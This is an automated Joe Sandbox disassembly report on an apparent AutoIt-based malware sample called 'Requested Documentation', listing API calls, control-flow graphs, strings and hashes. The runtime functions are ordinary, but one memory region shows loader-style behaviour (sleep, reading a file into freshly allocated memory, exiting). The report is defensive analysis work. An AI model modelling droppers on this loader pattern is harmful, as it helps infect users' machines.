                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 568c93fd8f0ec7ed09af74e6a3612ad18d2b446cff8f04f77700de0bf8452ece
                                                                              • Instruction ID: 5a4478f761b6040069b23d61e0566d9d8e784a9b6392fe519b1b11288f74d6c9
                                                                              • Opcode Fuzzy Hash: 568c93fd8f0ec7ed09af74e6a3612ad18d2b446cff8f04f77700de0bf8452ece
                                                                              • Instruction Fuzzy Hash: 5821B2B9D0161CAFDB10DFE4E889A9DBBF4FB09700F00412AF910A66A1DBB245469F91
                                                                              Function 0098708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00984706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A452F8,?,009837AE,?), ref: 00984724
                                                                                • Part of subcall function 009A050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00987165), ref: 009A052D
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009871A8
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009BE8C8
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009BE909
                                                                              • RegCloseKey.ADVAPI32(?), ref: 009BE947
                                                                              • _wcscat.LIBCMT ref: 009BE9A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                              • API String ID: 2673923337-2727554177
                                                                              • Opcode ID: daad580a3b446230c24929a572420261cc0a5dd6b39506f5f729bbb33d06e8cf
                                                                              • Instruction ID: 39db3665052ba19d8f5775df0e27b2131c85f7a12041a558611cb099564eb821
                                                                              • Opcode Fuzzy Hash: daad580a3b446230c24929a572420261cc0a5dd6b39506f5f729bbb33d06e8cf
                                                                              • Instruction Fuzzy Hash: A9718579904301AEC710EFA5E841ADBB7E8FFC6310B50492EF445972A0DBB2D549CB92
                                                                              Function 00983A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00983A50
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00983A5F
                                                                              • LoadIconW.USER32(00000063), ref: 00983A76
                                                                              • LoadIconW.USER32(000000A4), ref: 00983A88
                                                                              • LoadIconW.USER32(000000A2), ref: 00983A9A
                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AC0
                                                                              • RegisterClassExW.USER32(?), ref: 00983B16
                                                                                • Part of subcall function 00983041: GetSysColorBrush.USER32(0000000F), ref: 00983074
                                                                                • Part of subcall function 00983041: RegisterClassExW.USER32(00000030), ref: 0098309E
                                                                                • Part of subcall function 00983041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
                                                                                • Part of subcall function 00983041: InitCommonControlsEx.COMCTL32(?), ref: 009830CC
                                                                                • Part of subcall function 00983041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
                                                                                • Part of subcall function 00983041: LoadIconW.USER32(000000A9), ref: 009830F2
                                                                                • Part of subcall function 00983041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: d64f70a71f36dc2294f9ca50129ac833a9e19d996f977d6f14a0310dc37e22f7
                                                                              • Instruction ID: 1a3e7d52254374366d834e5c62051065350d2b63160fff9432ffb41a7e704d6e
                                                                              • Opcode Fuzzy Hash: d64f70a71f36dc2294f9ca50129ac833a9e19d996f977d6f14a0310dc37e22f7
                                                                              • Instruction Fuzzy Hash: 95214BB8D00708EFEB11DFF4EC09B9D7BB4FB4A711F00412AE500A62A2D3B656428F85
                                                                              Function 00983633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 767 983633-983681 769 9836e1-9836e3 767->769 770 983683-983686 767->770 769->770 771 9836e5 769->771 772 983688-98368f 770->772 773 9836e7 770->773 774 9836ca-9836d2 DefWindowProcW 771->774 777 98374b-983753 PostQuitMessage 772->777 778 983695-98369a 772->778 775 9836ed-9836f0 773->775 776 9bd0cc-9bd0fa call 991070 call 991093 773->776 782 9836d8-9836de 774->782 783 9836f2-9836f3 775->783 784 983715-98373c SetTimer RegisterWindowMessageW 775->784 810 9bd0ff-9bd106 776->810 781 983711-983713 777->781 779 9836a0-9836a2 778->779 780 9bd154-9bd168 call 9e2527 778->780 787 9836a8-9836ad 779->787 788 983755-983764 call 9844a0 779->788 780->781 804 9bd16e 780->804 781->782 791 9836f9-98370c KillTimer call 98443a call 983114 783->791 792 9bd06f-9bd072 783->792 784->781 789 98373e-983749 CreatePopupMenu 784->789 794 9bd139-9bd140 787->794 795 9836b3-9836b8 787->795 788->781 789->781 791->781 798 9bd0a8-9bd0c7 MoveWindow 792->798 799 9bd074-9bd076 792->799 794->774 809 9bd146-9bd14f call 9d7c36 794->809 802 9836be-9836c4 795->802 803 9bd124-9bd134 call 9e2d36 795->803 798->781 806 9bd078-9bd07b 799->806 807 9bd097-9bd0a3 SetFocus 799->807 802->774 802->810 803->781 804->774 806->802 811 9bd081-9bd092 call 991070 806->811 807->781 809->774 810->774 816 9bd10c-9bd11f call 98443a call 98434a 810->816 811->781 816->774
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 009836D2
                                                                              • KillTimer.USER32(?,00000001), ref: 009836FC
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0098371F
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0098372A
                                                                              • CreatePopupMenu.USER32 ref: 0098373E
                                                                              • PostQuitMessage.USER32(00000000), ref: 0098374D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated
                                                                              • API String ID: 129472671-2362178303
                                                                              • Opcode ID: 0d14fa86fafbe3e04b994bf9ba628f269bc040a02b4e1bbfa51ea372d35027df
                                                                              • Instruction ID: 2bea12679bd4f9f69483be5bb94a5f3dd8ccbca035275ca515438c31a36741a5
                                                                              • Opcode Fuzzy Hash: 0d14fa86fafbe3e04b994bf9ba628f269bc040a02b4e1bbfa51ea372d35027df
                                                                              • Instruction Fuzzy Hash: 16415BB9500509BBDF24BFBCDC0ABBD375CEB81700F104925F502963A2EAA6DD429762
                                                                              Function 00983766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                              • API String ID: 1825951767-3513169116
                                                                              • Opcode ID: 0a0fbdb080ec0dab5f9cc8b79f791412f2b1cadc8cc9142cd38d53957109f976
                                                                              • Instruction ID: 3ab42d32f36bc2e9a863a40add250f0db3ddc500029471ea5fee000018ab9d1e
                                                                              • Opcode Fuzzy Hash: 0a0fbdb080ec0dab5f9cc8b79f791412f2b1cadc8cc9142cd38d53957109f976
                                                                              • Instruction Fuzzy Hash: A0A15E7690021D9BCB14FBA4DC51AEEB778BF95710F44442AE415B7292EF749A08CBA0
                                                                              Function 013025D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 942 13025d0-130267e call 1300000 945 1302685-13026ab call 13034e0 CreateFileW 942->945 948 13026b2-13026c2 945->948 949 13026ad 945->949 954 13026c4 948->954 955 13026c9-13026e3 VirtualAlloc 948->955 950 13027fd-1302801 949->950 952 1302843-1302846 950->952 953 1302803-1302807 950->953 956 1302849-1302850 952->956 957 1302813-1302817 953->957 958 1302809-130280c 953->958 954->950 959 13026e5 955->959 960 13026ea-1302701 ReadFile 955->960 961 1302852-130285d 956->961 962 13028a5-13028ba 956->962 963 1302827-130282b 957->963 964 1302819-1302823 957->964 958->957 959->950 969 1302703 960->969 970 1302708-1302748 VirtualAlloc 960->970 971 1302861-130286d 961->971 972 130285f 961->972 965 13028ca-13028d2 962->965 966 13028bc-13028c7 VirtualFree 962->966 967 130283b 963->967 968 130282d-1302837 963->968 964->963 966->965 967->952 968->967 969->950 973 130274a 970->973 974 130274f-130276a call 1303730 970->974 975 1302881-130288d 971->975 976 130286f-130287f 971->976 972->962 973->950 982 1302775-130277f 974->982 979 130289a-13028a0 975->979 980 130288f-1302898 975->980 978 13028a3 976->978 978->956 979->978 980->978 983 1302781-13027b0 call 1303730 982->983 984 13027b2-13027c6 call 1303540 982->984 983->982 990 13027c8 984->990 991 13027ca-13027ce 984->991 990->950 992 13027d0-13027d4 CloseHandle 991->992 993 13027da-13027de 991->993 992->993 994 13027e0-13027eb VirtualFree 993->994 995 13027ee-13027f7 993->995 994->995 995->945 995->950
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013026A1
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013028C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                              • Instruction ID: c91bb44abb047a58325c02db1d3e135f70b7c6a3440704e9a7134e872ef1c675
                                                                              • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                              • Instruction Fuzzy Hash: D5A10A74E00209EBDB15CFA4C9A8BEEBBB5BF48708F208159E511BB2C1D7759A41CB54
                                                                              Function 009839D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1073 9839d5-983a45 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A03
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A24
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00983A38
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00983A41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: c7b65cf16f3c7f613b2a91a1ca34bbc6dd0fdddc9952165d83fcd9f6e69def2e
                                                                              • Instruction ID: a72c38e34deac92a7a221df717a54191c91d8ca28b07bad4e7e5b71e7b632c7d
                                                                              • Opcode Fuzzy Hash: c7b65cf16f3c7f613b2a91a1ca34bbc6dd0fdddc9952165d83fcd9f6e69def2e
                                                                              • Instruction Fuzzy Hash: E4F030789402947FEA3197A76C08EA73E7DE7C7F50B00002AB900B21B1C1E24C02CA70
                                                                              Function 013023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1074 13023b0-13024d1 call 1300000 call 13022a0 CreateFileW 1081 13024d3 1074->1081 1082 13024d8-13024e8 1074->1082 1083 1302588-130258d 1081->1083 1085 13024ea 1082->1085 1086 13024ef-1302509 VirtualAlloc 1082->1086 1085->1083 1087 130250b 1086->1087 1088 130250d-1302524 ReadFile 1086->1088 1087->1083 1089 1302526 1088->1089 1090 1302528-1302562 call 13022e0 call 13012a0 1088->1090 1089->1083 1095 1302564-1302579 call 1302330 1090->1095 1096 130257e-1302586 ExitProcess 1090->1096 1095->1096 1096->1083
                                                                              APIs
                                                                                • Part of subcall function 013022A0: Sleep.KERNELBASE(000001F4), ref: 013022B1
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013024C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: H6NCX5XIIMP68J0GAZ
                                                                              • API String ID: 2694422964-3600963330
                                                                              • Opcode ID: 17fb3d410e0bf0abfef8aff6d3f3b3525262bde8e220689b49bff0ffc1fa4a8a
                                                                              • Instruction ID: 7d98277e2311b55766fdb8fba96a54ba1adaac563697762be3ef63621c63bbcd
                                                                              • Opcode Fuzzy Hash: 17fb3d410e0bf0abfef8aff6d3f3b3525262bde8e220689b49bff0ffc1fa4a8a
                                                                              • Instruction Fuzzy Hash: 70515371D04249DBEF12D7A4C818BEFBBB9AF15304F044199E605B72C1D67A0B49CB65
                                                                              Function 0098407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1098 98407c-984092 1099 984098-9840ad call 987a16 1098->1099 1100 98416f-984173 1098->1100 1103 9bd3c8-9bd3d7 LoadStringW 1099->1103 1104 9840b3-9840d3 call 987bcc 1099->1104 1106 9bd3e2-9bd3fa call 987b2e call 986fe3 1103->1106 1104->1106 1108 9840d9-9840dd 1104->1108 1116 9840ed-98416a call 9a2de0 call 98454e call 9a2dbc Shell_NotifyIconW call 985904 1106->1116 1120 9bd400-9bd41e call 987cab call 986fe3 call 987cab 1106->1120 1110 9840e3-9840e8 call 987b2e 1108->1110 1111 984174-98417d call 988047 1108->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                                                              APIs
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009BD3D7
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • _memset.LIBCMT ref: 009840FC
                                                                              • _wcscpy.LIBCMT ref: 00984150
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00984160
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 3942752672-1585850449
                                                                              • Opcode ID: 1a829628ecd419efee06bc62c3ab7363a61c90a1e47d9816795f92339e853ddc
                                                                              • Instruction ID: 3d9897d6e32a22f5824d3a7fab5c9b4e1280d46912aeaf1a3709def3850f3dc9
                                                                              • Opcode Fuzzy Hash: 1a829628ecd419efee06bc62c3ab7363a61c90a1e47d9816795f92339e853ddc
                                                                              • Instruction Fuzzy Hash: 7931D075408305AFD321FBA0DC45FDBB7DCAF84304F20491AF585962A2EBB4D649CB92
                                                                              Function 009A541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1133 9a541d-9a5436 1134 9a5438-9a543d 1133->1134 1135 9a5453 1133->1135 1134->1135 1136 9a543f-9a5441 1134->1136 1137 9a5455-9a545b 1135->1137 1138 9a545c-9a5461 1136->1138 1139 9a5443-9a5448 call 9a8b28 1136->1139 1140 9a546f-9a5473 1138->1140 1141 9a5463-9a546d 1138->1141 1151 9a544e call 9a8db6 1139->1151 1144 9a5483-9a5485 1140->1144 1145 9a5475-9a5480 call 9a2de0 1140->1145 1141->1140 1143 9a5493-9a54a2 1141->1143 1149 9a54a9 1143->1149 1150 9a54a4-9a54a7 1143->1150 1144->1139 1148 9a5487-9a5491 1144->1148 1145->1144 1148->1139 1148->1143 1153 9a54ae-9a54b3 1149->1153 1150->1153 1151->1135 1155 9a54b9-9a54c0 1153->1155 1156 9a559c-9a559f 1153->1156 1157 9a54c2-9a54ca 1155->1157 1158 9a5501-9a5503 1155->1158 1156->1137 1157->1158 1161 9a54cc 1157->1161 1159 9a556d-9a556e call 9b0ba7 1158->1159 1160 9a5505-9a5507 1158->1160 1170 9a5573-9a5577 1159->1170 1163 9a552b-9a5536 1160->1163 1164 9a5509-9a5511 1160->1164 1165 9a55ca 1161->1165 1166 9a54d2-9a54d4 1161->1166 1173 9a553a-9a553d 1163->1173 1174 9a5538 1163->1174 1171 9a5513-9a551f 1164->1171 1172 9a5521-9a5525 1164->1172 1169 9a55ce-9a55d7 1165->1169 1167 9a54db-9a54e0 1166->1167 1168 9a54d6-9a54d8 1166->1168 1175 9a54e6-9a54ff call 9b0cc8 1167->1175 1176 9a55a4-9a55a8 1167->1176 1168->1167 1169->1137 1170->1169 1177 9a5579-9a557e 1170->1177 1178 9a5527-9a5529 1171->1178 1172->1178 1173->1176 1179 9a553f-9a554b call 9a46e6 call 9b0e5b 1173->1179 1174->1173 1193 9a5562-9a556b 1175->1193 1182 9a55ba-9a55c5 call 9a8b28 1176->1182 1183 9a55aa-9a55b7 call 9a2de0 1176->1183 1177->1176 1181 9a5580-9a5591 1177->1181 1178->1173 1194 9a5550-9a5555 1179->1194 1188 9a5594-9a5596 1181->1188 1182->1151 1183->1182 1188->1155 1188->1156 1193->1188 1195 9a555b-9a555e 1194->1195 1196 9a55dc-9a55e0 1194->1196 1195->1165 1197 9a5560 1195->1197 1196->1169 1197->1193
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1559183368-0
                                                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                              • Instruction ID: d546934cc353bcf0b98597a77321d27220fca78b565254fd885d754c9b256029
                                                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                              • Instruction Fuzzy Hash: 3751C570F00B05DBCB249F69D8846AE77BAAF46331F258729F825962D1D774DD908BC0
                                                                              Function 0098686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00984DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E0F
                                                                              • _free.LIBCMT ref: 009BE263
                                                                              • _free.LIBCMT ref: 009BE2AA
                                                                                • Part of subcall function 00986A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986BAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 2861923089-1757145024
                                                                              • Opcode ID: 0ebf266b22ceadd4423a2e1772fc6bdc9cd2b4278875413a6a03184ba0e3b636
                                                                              • Instruction ID: 244213f66877e0f2ac1aa8ab9dd568760dfcf36c01849f1cda8b2b0db483a78c
                                                                              • Opcode Fuzzy Hash: 0ebf266b22ceadd4423a2e1772fc6bdc9cd2b4278875413a6a03184ba0e3b636
                                                                              • Instruction Fuzzy Hash: DF917071904219AFCF14EFA4CC91AEDB7B8FF59320F10442AF815AB2A1DB74AD05CB50
                                                                              Function 009835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009835A1,SwapMouseButtons,00000004,?), ref: 009835D4
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 009835F5
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 00983617
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
                                                                              • Instruction ID: 07ff0d10f017a8730f2d581b7c48ed035a49bc7e215d34e7fa71c65562b48e52
